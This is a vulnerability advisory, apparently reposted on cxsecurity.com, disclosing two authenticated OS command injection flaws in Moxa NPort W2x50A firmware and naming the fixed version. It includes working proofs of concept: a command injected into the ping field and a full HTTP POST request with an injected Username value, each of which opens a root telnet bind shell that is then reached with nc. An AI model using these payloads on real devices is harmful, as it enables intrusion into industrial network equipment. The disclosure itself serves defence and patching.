Moxa NPort W2x50A 2.1 OS Command Injection

2018.12.03
Credit: Maxim Khazov
Risk: High
Local: No
Remote: Yes
CWE: CWE-78

Moxa NPort W2x50A products with firmware version 2.1 Build_17112017 or lower are vulnerable to several authenticated OS Command Injection vulnerabilities: #1 Authenticated OS Command Injection in web server ping functionality Reserverd CVE ID: CVE-2018-19659 A specially crafted HTTP POST request to /goform/net_WebPingGetValue can result in running OS commands as the root user. Exploitation required authentication. This is similar to CVE-2017-12120. Proof-of-concept: 1. Authenticate to Moxa NPort W2x50A device. 2. Go to Main menu a System Management a Maintenance a Ping a Destination 3. Enter ;telnetd -l/bin/sh -p4444&;. in 'Destination' field 4. Connect to opened bind shell: nc $IP_ADDRESS 4444 #2 Authenticated OS Command Injection in web server wlan profile properties functionality Reserverd CVE ID: CVE-2018-19660 A specially crafted HTTP POST request to /goform/net_WebSettingProfileSecurity can result in running OS commands as the root user. Exploitation required authentication. Proof-of-concept (sample HTTP request opening bind shell on port 4444): POST /goform/webSettingProfileSecurity?profileID=1 HTTP/1.1 Host: {IP:PORT} User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: SessionID={YOURSESSIONID} Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 309 Authentication=3&EAP_method=1&Username= ;telnetd -l/bin/sh -p4444&; These vulnerabilities were fixed in the firmware version 2.2 Build_18082311. https://www.moxa.com/support/download.aspx?type=support&id=14781 Best regards, Maksim Khazov


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top